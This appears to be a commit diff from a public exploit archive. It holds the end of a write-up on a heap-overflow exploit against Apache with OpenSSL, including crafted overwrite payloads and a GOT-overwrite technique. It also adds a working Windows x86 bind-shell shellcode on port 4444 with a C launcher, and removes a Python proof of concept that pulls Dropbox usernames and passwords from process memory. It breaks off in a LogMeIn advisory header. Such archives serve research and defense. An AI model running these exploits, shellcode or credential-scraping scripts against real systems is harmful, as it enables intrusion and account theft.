mind is to overwrite the next malloc chunk and then make the OpenSSL code
|
||||
call free() on the SSL_SESSION structure.
|
||||
|
||||
After we send a CLIENT_MASTER_KEY message, we'll read a SERVER_VERIFY packet
|
||||
from the server and then we'll respond with a CLIENT_FINISHED message.
|
||||
The server uses this the contents of this message to verify that the
|
||||
key exchange succeeded. If we return a wrong connection id, the server
|
||||
will abort the connection and free the SSL_SESSION structure, which is
|
||||
exactly what we want.
|
||||
|
||||
We'll overwrite the KEY_ARG array with 8 random bytes and the following
|
||||
string:
|
||||
|
||||
unsigned char overwrite_next_chunk[] =
|
||||
"AAAA" /* int master_key_length; */
|
||||
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */
|
||||
"AAAA" /* unsigned int session_id_length; */
|
||||
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH]; */
|
||||
"AAAA" /* unsigned int sid_ctx_length; */
|
||||
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */
|
||||
"AAAA" /* unsigned int sid_ctx_length; */
|
||||
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */
|
||||
"AAAA" /* int not_resumable; */
|
||||
"\x00\x00\x00\x00" /* struct sess_cert_st *sess_cert; */
|
||||
"\x00\x00\x00\x00" /* X509 *peer; */
|
||||
"AAAA" /* long verify_result; */
|
||||
"\x01\x00\x00\x00" /* int references; */
|
||||
"AAAA" /* int timeout; */
|
||||
"AAAA" /* int time */
|
||||
"AAAA" /* int compress_meth; */
|
||||
"\x00\x00\x00\x00" /* SSL_CIPHER *cipher; */
|
||||
"AAAA" /* unsigned long cipher_id; */
|
||||
"\x00\x00\x00\x00" /* STACK_OF(SSL_CIPHER) *ciphers; */
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO_EX_DATA ex_data; */
|
||||
"AAAAAAAA" /* struct ssl_session_st *prev,*next; */
|
||||
"\x00\x00\x00\x00" /* Size of previous chunk */
|
||||
"\x11\x00\x00\x00" /* Size of chunk, in bytes */
|
||||
"fdfd" /* Forward and back pointers */
|
||||
"bkbk"
|
||||
"\x10\x00\x00\x00" /* Size of previous chunk */
|
||||
"\x10\x00\x00\x00" /* Size of chunk, PREV_INUSE is set */
|
||||
|
||||
The "A" bytes don't affect the OpenSSL control flow. The other bytes must be
|
||||
set to specific values to make the exploit work. For example, the peer and
|
||||
sess_cert pointers must be NULL, because the SSL cleanup code will call
|
||||
free() on them before it frees the SSL_SESSION structure.
|
||||
|
||||
The free() call will write the value of the bk pointer to the memory
|
||||
address in the fd pointer + 12 bytes. We'll put our shellcode address
|
||||
in the bk pointer and we'll write it to the free() entry in the GOT
|
||||
table.
|
||||
|
||||
If you don't understand how freeing this malloc chunk overwrites the GOT
|
||||
entry or don't know what the GOT table is, visit juliano's site at
|
||||
http://community.core-sdi.com/~juliano/ and read some papers.
|
||||
|
||||
|
||||
---/ Getting the Shellcode Address
|
||||
|
||||
There is only one little problem. We need a place to put our shellcode
|
||||
and we need the exact shellcode address. The trick is to use the
|
||||
SERVER_FINISHED message. This message includes the session id, which
|
||||
is read from the SSL_SESSION structure. The server reads session_id_length
|
||||
bytes from the session_id[] array and sends them to the client. We can
|
||||
overwrite the session_id_length variable and complete the handshake.
|
||||
If session_id_length is long enough, the SERVER_FINISHED message will
|
||||
include the contents of the SSL_SESSION structure.
|
||||
|
||||
To get the contents of the session structure, we'll overwrite the
|
||||
KEY_ARG array with 8 random bytes and the following string:
|
||||
|
||||
unsigned char overwrite_session_id_length[] =
|
||||
"AAAA" /* int master_key_length; */
|
||||
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */
|
||||
"\x70\x00\x00\x00"; /* unsigned int session_id_length; */
|
||||
|
||||
Now let's imagine the heap state when we send our connection request.
|
||||
We have a heap, which contains some allocated chunks of memory and a
|
||||
large 'top' chunk, covering all free memory.
|
||||
|
||||
When the server receives the connection, it forks a child and the child
|
||||
allocates the SSL_SESSION structure. If there has not been a signifficant
|
||||
malloc/free activity, the fragmentation of the memory will be low and the
|
||||
new chunk will be allocated from the beginning of the 'top' chunk.
|
||||
|
||||
The next allocated chunk is a 16 bytes chunk which holds a
|
||||
STACK_OF(SSL_CIPHER) structure. This chunk is also allocated from the
|
||||
beginning of the 'top' chunk, so it's located right above the SSL_SESSION
|
||||
structure. The address of this chunk is stored in the session->ciphers
|
||||
variable.
|
||||
|
||||
If we're lucky, the memory would look like this:
|
||||
|
||||
| top chunk |
|
||||
|-----------|
|
||||
session->ciphers | 16 bytes | <- STACK_OF(SSL_CIPHER) structure
|
||||
points here -> |-----------|
|
||||
| 368 bytes | <- SSL_SESSION structure
|
||||
|-----------|
|
||||
|
||||
We can read the session->ciphers pointer from the SSL_SESSION structure
|
||||
in the SERVER_FINISHED message. By subtracting 368 from it, we'll get
|
||||
the address of the SSL_SESSION structure, and thus the address of
|
||||
the data we've overwritten.
|
||||
|
||||
|
||||
---/ fork() Is Your Friend
|
||||
|
||||
We'll use the same buffer overflow to get the address of the shellcode
|
||||
and to overwrite the malloc chunks. The problem is that we need to
|
||||
know the shellcode address before we send it to the server.
|
||||
|
||||
The only solution is to send 2 requests. The first request overwrites
|
||||
session_id_length and we complete the handshake to get the SERVER_FINISHED
|
||||
message. Then we adjust our shellcode and open a second connection
|
||||
which we use to send it.
|
||||
|
||||
If we're dealing with a forking server like Apache, the two children
|
||||
will have an identical memory layout and malloc() will put the
|
||||
session structure at the same address. Of course, life is never that
|
||||
simple. Apache children can handle multiple requests, which would
|
||||
change the memory allocation pattern of the two children we use.
|
||||
|
||||
To guarantee that both children are freshly spawned, our exploit
|
||||
will open a number of connections to the server before sending the
|
||||
two important requests. These connection should use up all available
|
||||
Apache children and force new ones to be spawned.
|
||||
|
||||
If the server traffic is high, the exploit might fail. If the
|
||||
memory allocation patterns are different, the exploit might fail.
|
||||
If you have a wrong GOT address, the exploit will definitely fail.
|
||||
|
||||
|
||||
---------[ How Does openssl-too-open Work? ]
|
||||
|
||||
openssl-scanner overflows the master_key_length, master_key[] and session_id_length
|
||||
variables in the SSL_SESSION structure. The first two are uninitialized at this point,
|
||||
so overwriting them has no effect on openssl. The first place where the session_id_length
|
||||
variable is used after we overwrite it is in session_finish() (ssl/s2_srvr.c:847)
|
||||
|
||||
memcpy(p,s->session->session_id, (unsigned int)s->session->session_id_length);
|
||||
|
||||
This data is returned in the SERVER_FINISHED packet. openssl-scanner checks the length
|
||||
of the data. If it matches the value we set session_id_length to, then the server is
|
||||
exploitable.
|
||||
|
||||
OpenSSL 0.9.6e and higher versions return
|
||||
192.160.0.2: Server error: SSL2_PE_UNDEFINED_ERROR (0x00) after KEY_ARG data was sent. Server is not vulnerable.
|
||||
|
||||
The updates that most vendors have put out backport the changes from 0.9.6e to 0.9.6b
|
||||
or some other version of OpenSSL. They don't return an error like 0.9.6e.
|
||||
The updated RedHat and Debian packages) would close the connection immediatelly
|
||||
after they receive the oversized KEY_ARG data, causing openssl-scanner to report
|
||||
|
||||
192.168.0.1: Connection closed after KEY_ARG data was sent. Server is most likely not vulnerable.
|
||||
|
||||
IIS servers exhibit the same behavior.
|
||||
|
||||
IIS servers that don't have a certificate set up close the connection as soon as
|
||||
they receive the CLIENT_HELLO packet. openssl-scanner reports this as
|
||||
|
||||
192.168.0.2: Connection unexpectedly closed
|
||||
|
||||
|
||||
/* EOF */
|
||||
|
||||
|
||||
|
||||
|
||||
http://www.phreedom.org/solar/exploits/apache-openssl/openssl-too-open.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40347.tar.gz (openssl-too-open.tar.gz)
|
|
@ -1,5 +1,5 @@
|
|||
/*
|
||||
* http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
|
||||
* E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
|
||||
*
|
||||
* OF version r00t VERY PRIV8 spabam
|
||||
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
|
519
platforms/win_x86/shellcode/40352.c
Executable file
519
platforms/win_x86/shellcode/40352.c
Executable file
|
@ -0,0 +1,519 @@
|
|||
/*
|
||||
# Title : Windows x86 bind shell tcp shellcode
|
||||
# Author : Roziul Hasan Khan Shifat
|
||||
# Date : 08-09-2016
|
||||
# Tested On : Windows 7 Ultimate , Starter x86
|
||||
*/
|
||||
|
||||
//Note: This shellcode will only works on x86
|
||||
|
||||
/*
|
||||
section .text
|
||||
global _start
|
||||
_start:
|
||||
|
||||
xor ecx,ecx
|
||||
mov eax,[fs:ecx+0x30] ;PEB
|
||||
mov eax,[eax+0xc] ;PEB.Ldr
|
||||
mov esi,[eax+0x14] ;PEB.Ldr->InMemOrderModuleList
|
||||
lodsd
|
||||
xchg esi,eax
|
||||
lodsd
|
||||
mov edi,[eax+0x10] ;kernel32.dll base address
|
||||
|
||||
|
||||
mov ebx,[edi+0x3c] ;DOS->elf_anew
|
||||
add ebx,edi ;PE HEADER
|
||||
mov ebx,[ebx+0x78]
|
||||
add ebx,edi ;kernel32 IMAGE_EXPORT_DIRECTORY
|
||||
|
||||
|
||||
sub esp,32
|
||||
lea esi,[esp]
|
||||
|
||||
|
||||
mov cx,660
|
||||
|
||||
mov edx,[ebx+0x1c] ;AddressOfFunctions
|
||||
add edx,edi
|
||||
|
||||
mov eax,[edx+ecx]
|
||||
add eax,edi
|
||||
|
||||
mov [esi],dword eax ;CreateProcessA() at offset 0
|
||||
|
||||
mov cx,1128
|
||||
|
||||
mov eax,[edx+ecx]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+4],dword eax ;ExitProcess() at offset 4
|
||||
|
||||
;------------------------------------
|
||||
;finding base address of ws2_32.dll
|
||||
|
||||
mov cx,3312
|
||||
|
||||
mov eax,[edx+ecx]
|
||||
add eax,edi
|
||||
|
||||
xor ecx,ecx
|
||||
push 0x41416c6c
|
||||
mov [esp+2],word cx
|
||||
push 0x642e3233
|
||||
push 0x5f327377
|
||||
|
||||
lea ebx,[esp]
|
||||
|
||||
push ebx
|
||||
call eax
|
||||
|
||||
;---------------------------
|
||||
mov edi,eax
|
||||
;---------------------
|
||||
mov ebx,[edi+0x3c] ;DOS->elf_anew
|
||||
add ebx,edi ;PE HEADER
|
||||
mov ebx,[ebx+0x78]
|
||||
add ebx,edi ; ws2_32.dll IMAGE_EXPORT_DIRECTORY
|
||||
|
||||
mov edx,[ebx+0x1c] ;AddressOfFunctions
|
||||
add edx,edi
|
||||
|
||||
xor ecx,ecx
|
||||
mov cx,456
|
||||
|
||||
mov eax,[edx+ecx]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+8],dword eax ;WSAStartup() at offset 8
|
||||
|
||||
mov cx,392
|
||||
|
||||
mov eax,[edx+ecx]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+12],dword eax ;WSASocketA() at offset 12
|
||||
|
||||
|
||||
mov eax,[edx+4]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+16],dword eax ;bind() at offset 16
|
||||
|
||||
mov eax,[edx+48]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+20],dword eax ;listen() at offset 20
|
||||
|
||||
mov eax,[edx]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+24],dword eax ;accept() at offset 24
|
||||
|
||||
mov eax,[edx+80]
|
||||
add eax,edi
|
||||
|
||||
mov [esi+28],dword eax ;setsockopt() at offset 28
|
||||
;-------------------------------------------------
|
||||
;WSAStartup(514, &WSADATA)
|
||||
mov cx,400
|
||||
sub esp,ecx
|
||||
|
||||
lea ebx,[esp]
|
||||
|
||||
mov cx,514
|
||||
|
||||
push ebx
|
||||
push ecx
|
||||
|
||||
call dword [esi+8]
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL)
|
||||
|
||||
xor ecx,ecx
|
||||
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
|
||||
mov cl,6
|
||||
push ecx
|
||||
|
||||
sub ecx,5
|
||||
push ecx
|
||||
|
||||
inc ecx
|
||||
push ecx
|
||||
|
||||
call dword [esi+12]
|
||||
;----------------------------
|
||||
mov edi,eax ;SOCKET
|
||||
|
||||
;----------------------------------
|
||||
;setsockopt(sock,0xffff,4,&int l=1,int j=2)
|
||||
|
||||
cdq
|
||||
mov dl,2
|
||||
|
||||
push edx
|
||||
dec edx
|
||||
|
||||
push edx
|
||||
lea ecx,[esp]
|
||||
|
||||
mov dl,4
|
||||
|
||||
push ecx
|
||||
push edx
|
||||
|
||||
mov dx,0xffff
|
||||
push edx
|
||||
push edi
|
||||
|
||||
call dword [esi+28]
|
||||
|
||||
|
||||
;--------------------------------------------
|
||||
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16);
|
||||
|
||||
cdq
|
||||
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
|
||||
mov [esp],byte 2
|
||||
mov [esp+2],word 0x5c11 ;port 4444
|
||||
|
||||
lea ecx,[esp]
|
||||
mov dl,16
|
||||
|
||||
push edx
|
||||
push ecx
|
||||
push edi
|
||||
|
||||
call dword [esi+16]
|
||||
|
||||
;--------------------------------
|
||||
;listen(SOCKET,1);
|
||||
cdq
|
||||
inc edx
|
||||
push edx
|
||||
push edi
|
||||
|
||||
call dword [esi+20]
|
||||
;-----------------------------
|
||||
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,&16);
|
||||
|
||||
cdq
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
mov dl,16
|
||||
lea ecx,[esp]
|
||||
|
||||
|
||||
|
||||
push edx
|
||||
lea ebx,[esp]
|
||||
|
||||
push ebx
|
||||
push ecx
|
||||
push edi
|
||||
|
||||
call dword [esi+24]
|
||||
;-----------------------
|
||||
mov edi,eax ;CLIent socket
|
||||
;-----------------------
|
||||
|
||||
cdq
|
||||
sub esp,16
|
||||
lea ebx,[esp] ;PROCESS_INFORMATION
|
||||
|
||||
push edi
|
||||
push edi
|
||||
push edi
|
||||
push edx
|
||||
|
||||
push edx
|
||||
|
||||
mov dl,255
|
||||
inc edx
|
||||
|
||||
push edx
|
||||
cdq
|
||||
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
|
||||
mov dl,68
|
||||
push edx
|
||||
|
||||
lea ecx,[esp] ;STARTUPINFOA
|
||||
|
||||
cdq
|
||||
push 0x41657865
|
||||
mov [esp+3],byte dl
|
||||
push 0x2e646d63
|
||||
|
||||
lea eax,[esp]
|
||||
|
||||
;---------------------------------------------
|
||||
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFORMATION)
|
||||
|
||||
push ebx
|
||||
push ecx
|
||||
|
||||
push edx
|
||||
push edx
|
||||
push edx
|
||||
|
||||
inc edx
|
||||
push edx
|
||||
cdq
|
||||
|
||||
push edx
|
||||
push edx
|
||||
|
||||
push eax
|
||||
push edx
|
||||
|
||||
call dword [esi]
|
||||
;-----------------------
|
||||
push eax
|
||||
call dword [esi+4]
|
||||
|
||||
*/
|
||||
|
||||
|
||||
/*
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
00000000 <_start>:
|
||||
0: 31 c9 xor %ecx,%ecx
|
||||
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
|
||||
6: 8b 40 0c mov 0xc(%eax),%eax
|
||||
9: 8b 70 14 mov 0x14(%eax),%esi
|
||||
c: ad lods %ds:(%esi),%eax
|
||||
d: 96 xchg %eax,%esi
|
||||
e: ad lods %ds:(%esi),%eax
|
||||
f: 8b 78 10 mov 0x10(%eax),%edi
|
||||
12: 8b 5f 3c mov 0x3c(%edi),%ebx
|
||||
15: 01 fb add %edi,%ebx
|
||||
17: 8b 5b 78 mov 0x78(%ebx),%ebx
|
||||
1a: 01 fb add %edi,%ebx
|
||||
1c: 83 ec 20 sub $0x20,%esp
|
||||
1f: 8d 34 24 lea (%esp),%esi
|
||||
22: 66 b9 94 02 mov $0x294,%cx
|
||||
26: 8b 53 1c mov 0x1c(%ebx),%edx
|
||||
29: 01 fa add %edi,%edx
|
||||
2b: 8b 04 0a mov (%edx,%ecx,1),%eax
|
||||
2e: 01 f8 add %edi,%eax
|
||||
30: 89 06 mov %eax,(%esi)
|
||||
32: 66 b9 68 04 mov $0x468,%cx
|
||||
36: 8b 04 0a mov (%edx,%ecx,1),%eax
|
||||
39: 01 f8 add %edi,%eax
|
||||
3b: 89 46 04 mov %eax,0x4(%esi)
|
||||
3e: 66 b9 f0 0c mov $0xcf0,%cx
|
||||
42: 8b 04 0a mov (%edx,%ecx,1),%eax
|
||||
45: 01 f8 add %edi,%eax
|
||||
47: 31 c9 xor %ecx,%ecx
|
||||
49: 68 6c 6c 41 41 push $0x41416c6c
|
||||
4e: 66 89 4c 24 02 mov %cx,0x2(%esp)
|
||||
53: 68 33 32 2e 64 push $0x642e3233
|
||||
58: 68 77 73 32 5f push $0x5f327377
|
||||
5d: 8d 1c 24 lea (%esp),%ebx
|
||||
60: 53 push %ebx
|
||||
61: ff d0 call *%eax
|
||||
63: 89 c7 mov %eax,%edi
|
||||
65: 8b 5f 3c mov 0x3c(%edi),%ebx
|
||||
68: 01 fb add %edi,%ebx
|
||||
6a: 8b 5b 78 mov 0x78(%ebx),%ebx
|
||||
6d: 01 fb add %edi,%ebx
|
||||
6f: 8b 53 1c mov 0x1c(%ebx),%edx
|
||||
72: 01 fa add %edi,%edx
|
||||
74: 31 c9 xor %ecx,%ecx
|
||||
76: 66 b9 c8 01 mov $0x1c8,%cx
|
||||
7a: 8b 04 0a mov (%edx,%ecx,1),%eax
|
||||
7d: 01 f8 add %edi,%eax
|
||||
7f: 89 46 08 mov %eax,0x8(%esi)
|
||||
82: 66 b9 88 01 mov $0x188,%cx
|
||||
86: 8b 04 0a mov (%edx,%ecx,1),%eax
|
||||
89: 01 f8 add %edi,%eax
|
||||
8b: 89 46 0c mov %eax,0xc(%esi)
|
||||
8e: 8b 42 04 mov 0x4(%edx),%eax
|
||||
91: 01 f8 add %edi,%eax
|
||||
93: 89 46 10 mov %eax,0x10(%esi)
|
||||
96: 8b 42 30 mov 0x30(%edx),%eax
|
||||
99: 01 f8 add %edi,%eax
|
||||
9b: 89 46 14 mov %eax,0x14(%esi)
|
||||
9e: 8b 02 mov (%edx),%eax
|
||||
a0: 01 f8 add %edi,%eax
|
||||
a2: 89 46 18 mov %eax,0x18(%esi)
|
||||
a5: 8b 42 50 mov 0x50(%edx),%eax
|
||||
a8: 01 f8 add %edi,%eax
|
||||
aa: 89 46 1c mov %eax,0x1c(%esi)
|
||||
ad: 66 b9 90 01 mov $0x190,%cx
|
||||
b1: 29 cc sub %ecx,%esp
|
||||
b3: 8d 1c 24 lea (%esp),%ebx
|
||||
b6: 66 b9 02 02 mov $0x202,%cx
|
||||
ba: 53 push %ebx
|
||||
bb: 51 push %ecx
|
||||
bc: ff 56 08 call *0x8(%esi)
|
||||
bf: 31 c9 xor %ecx,%ecx
|
||||
c1: 51 push %ecx
|
||||
c2: 51 push %ecx
|
||||
c3: 51 push %ecx
|
||||
c4: b1 06 mov $0x6,%cl
|
||||
c6: 51 push %ecx
|
||||
c7: 83 e9 05 sub $0x5,%ecx
|
||||
ca: 51 push %ecx
|
||||
cb: 41 inc %ecx
|
||||
cc: 51 push %ecx
|
||||
cd: ff 56 0c call *0xc(%esi)
|
||||
d0: 89 c7 mov %eax,%edi
|
||||
d2: 99 cltd
|
||||
d3: b2 02 mov $0x2,%dl
|
||||
d5: 52 push %edx
|
||||
d6: 4a dec %edx
|
||||
d7: 52 push %edx
|
||||
d8: 8d 0c 24 lea (%esp),%ecx
|
||||
db: b2 04 mov $0x4,%dl
|
||||
dd: 51 push %ecx
|
||||
de: 52 push %edx
|
||||
df: 66 ba ff ff mov $0xffff,%dx
|
||||
e3: 52 push %edx
|
||||
e4: 57 push %edi
|
||||
e5: ff 56 1c call *0x1c(%esi)
|
||||
e8: 99 cltd
|
||||
e9: 52 push %edx
|
||||
ea: 52 push %edx
|
||||
eb: 52 push %edx
|
||||
ec: 52 push %edx
|
||||
ed: c6 04 24 02 movb $0x2,(%esp)
|
||||
f1: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%esp)
|
||||
f8: 8d 0c 24 lea (%esp),%ecx
|
||||
fb: b2 10 mov $0x10,%dl
|
||||
fd: 52 push %edx
|
||||
fe: 51 push %ecx
|
||||
ff: 57 push %edi
|
||||
100: ff 56 10 call *0x10(%esi)
|
||||
103: 99 cltd
|
||||
104: 42 inc %edx
|
||||
105: 52 push %edx
|
||||
106: 57 push %edi
|
||||
107: ff 56 14 call *0x14(%esi)
|
||||
10a: 99 cltd
|
||||
10b: 52 push %edx
|
||||
10c: 52 push %edx
|
||||
10d: 52 push %edx
|
||||
10e: 52 push %edx
|
||||
10f: b2 10 mov $0x10,%dl
|
||||
111: 8d 0c 24 lea (%esp),%ecx
|
||||
114: 52 push %edx
|
||||
115: 8d 1c 24 lea (%esp),%ebx
|
||||
118: 53 push %ebx
|
||||
119: 51 push %ecx
|
||||
11a: 57 push %edi
|
||||
11b: ff 56 18 call *0x18(%esi)
|
||||
11e: 89 c7 mov %eax,%edi
|
||||
120: 99 cltd
|
||||
121: 83 ec 10 sub $0x10,%esp
|
||||
124: 8d 1c 24 lea (%esp),%ebx
|
||||
127: 57 push %edi
|
||||
128: 57 push %edi
|
||||
129: 57 push %edi
|
||||
12a: 52 push %edx
|
||||
12b: 52 push %edx
|
||||
12c: b2 ff mov $0xff,%dl
|
||||
12e: 42 inc %edx
|
||||
12f: 52 push %edx
|
||||
130: 99 cltd
|
||||
131: 52 push %edx
|
||||
132: 52 push %edx
|
||||
133: 52 push %edx
|
||||
134: 52 push %edx
|
||||
135: 52 push %edx
|
||||
136: 52 push %edx
|
||||
137: 52 push %edx
|
||||
138: 52 push %edx
|
||||
139: 52 push %edx
|
||||
13a: 52 push %edx
|
||||
13b: b2 44 mov $0x44,%dl
|
||||
13d: 52 push %edx
|
||||
13e: 8d 0c 24 lea (%esp),%ecx
|
||||
141: 99 cltd
|
||||
142: 68 65 78 65 41 push $0x41657865
|
||||
147: 88 54 24 03 mov %dl,0x3(%esp)
|
||||
14b: 68 63 6d 64 2e push $0x2e646d63
|
||||
150: 8d 04 24 lea (%esp),%eax
|
||||
153: 53 push %ebx
|
||||
154: 51 push %ecx
|
||||
155: 52 push %edx
|
||||
156: 52 push %edx
|
||||
157: 52 push %edx
|
||||
158: 42 inc %edx
|
||||
159: 52 push %edx
|
||||
15a: 99 cltd
|
||||
15b: 52 push %edx
|
||||
15c: 52 push %edx
|
||||
15d: 50 push %eax
|
||||
15e: 52 push %edx
|
||||
15f: ff 16 call *(%esi)
|
||||
161: 50 push %eax
|
||||
162: ff 56 04 call *0x4(%esi)
|
||||
*/
|
||||
|
||||
|
||||
#include<windows.h>
|
||||
#include<stdio.h>
|
||||
#include<shellapi.h>
|
||||
#include<stdlib.h>
|
||||
|
||||
char shellcode[]=\
|
||||
|
||||
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x78\x10\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x83\xec\x20\x8d\x34\x24\x66\xb9\x94\x02\x8b\x53\x1c\x01\xfa\x8b\x04\x0a\x01\xf8\x89\x06\x66\xb9\x68\x04\x8b\x04\x0a\x01\xf8\x89\x46\x04\x66\xb9\xf0\x0c\x8b\x04\x0a\x01\xf8\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x1c\x24\x53\xff\xd0\x89\xc7\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x53\x1c\x01\xfa\x31\xc9\x66\xb9\xc8\x01\x8b\x04\x0a\x01\xf8\x89\x46\x08\x66\xb9\x88\x01\x8b\x04\x0a\x01\xf8\x89\x46\x0c\x8b\x42\x04\x01\xf8\x89\x46\x10\x8b\x42\x30\x01\xf8\x89\x46\x14\x8b\x02\x01\xf8\x89\x46\x18\x8b\x42\x50\x01\xf8\x89\x46\x1c\x66\xb9\x90\x01\x29\xcc\x8d\x1c\x24\x66\xb9\x02\x02\x53\x51\xff\x56\x08\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x0c\x89\xc7\x99\xb2\x02\x52\x4a\x52\x8d\x0c\x24\xb2\x04\x51\x52\x66\xba\xff\xff\x52\x57\xff\x56\x1c\x99\x52\x52\x52\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x8d\x0c\x24\xb2\x10\x52\x51\x57\xff\x56\x10\x99\x42\x52\x57\xff\x56\x14\x99\x52\x52\x52\x52\xb2\x10\x8d\x0c\x24\x52\x8d\x1c\x24\x53\x51\x57\xff\x56\x18\x89\xc7\x99\x83\xec\x10\x8d\x1c\x24\x57\x57\x57\x52\x52\xb2\xff\x42\x52\x99\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\xb2\x44\x52\x8d\x0c\x24\x99\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x04\x24\x53\x51\x52\x52\x52\x42\x52\x99\x52\x52\x50\x52\xff\x16\x50\xff\x56\x04";
|
||||
|
||||
int main(int i,char *a[])
|
||||
{
|
||||
|
||||
int mode;
|
||||
|
||||
|
||||
|
||||
if(i==1)
|
||||
mode=1;
|
||||
else
|
||||
mode=atoi(a[1]);
|
||||
|
||||
switch(mode)
|
||||
{
|
||||
case 1:
|
||||
ShellExecute(NULL,NULL,a[0],"78",NULL,0);
|
||||
break;
|
||||
|
||||
case 78:
|
||||
(* (int(*)())shellcode )();
|
||||
break;
|
||||
|
||||
default:
|
||||
break;
|
||||
}
|
||||
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -1,242 +0,0 @@
|
|||
#####
|
||||
# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure
|
||||
# Tested on Windows Windows Server 2012 R2 64bit, English
|
||||
# Vendor Homepage @ https://www.dropbox.com
|
||||
# Date 06/09/2016
|
||||
# Bug Discovery by:
|
||||
#
|
||||
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
# http://www.black-rose.ml
|
||||
#
|
||||
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
|
||||
# https://1-33-7.com/
|
||||
#
|
||||
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
|
||||
# http://korznikov.com/
|
||||
#
|
||||
#####
|
||||
# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
|
||||
# A potential attacker could reveal the supplied username and password in order to gain access to account.
|
||||
#####
|
||||
# Proof-Of-Concept Code:
|
||||
|
||||
import time
|
||||
import urllib
|
||||
from winappdbg import Debug, Process
|
||||
|
||||
username = ''
|
||||
password = ''
|
||||
found = 0
|
||||
filename = "Dropbox.exe"
|
||||
process_pid = 0
|
||||
memory_dump = []
|
||||
|
||||
debug = Debug()
|
||||
try:
|
||||
print "[~] Searching for pid by process name '%s'.." % (filename)
|
||||
time.sleep(1)
|
||||
debug.system.scan_processes()
|
||||
for (process, process_name) in debug.system.find_processes_by_filename(filename):
|
||||
process_pid = process.get_pid()
|
||||
if process_pid is not 0:
|
||||
print "[+] Found process with pid #%d" % (process_pid)
|
||||
time.sleep(1)
|
||||
print "[~] Trying to read memory for pid #%d" % (process_pid)
|
||||
|
||||
process = Process(process_pid)
|
||||
for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
|
||||
memory_dump.append(process.read(address,100))
|
||||
for i in range(len(memory_dump)):
|
||||
email_addr = memory_dump[i].split('email=')[1]
|
||||
tmp_passwd = memory_dump[i].split('password=')[1]
|
||||
username = email_addr.split('\x00')[0]
|
||||
password = tmp_passwd.split('&is_sso_link=')[0]
|
||||
if username != '' and password !='':
|
||||
found = 1
|
||||
print "[+] Credentials found!\r\n----------------------------------------"
|
||||
print "[+] Username: %s" % urllib.unquote_plus(username)
|
||||
print "[+] Password: %s" % password
|
||||
if found == 0:
|
||||
print "[-] Credentials not found! Make sure the client is connected."
|
||||
else:
|
||||
print "[-] No process found with name '%s'." % (filename)
|
||||
|
||||
debug.loop()
|
||||
finally:
|
||||
debug.stop()
|
||||
|
||||
|
||||
|
||||
######################################################################
|
||||
|
||||
#####
|
||||
# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
|
||||
# Tested on Windows Windows Server 2012 R2 64bit, English
|
||||
# Vendor Homepage @ https://secure.logmein.com/home/en
|
||||
# Date 06/09/2016
|
||||
# Bug Discovery by:
|
||||
#
|
||||
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
|
||||
# http://korznikov.com/
|
||||
#
|
||||
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
|
||||
# https://1-33-7.com/
|
||||
#
|
||||
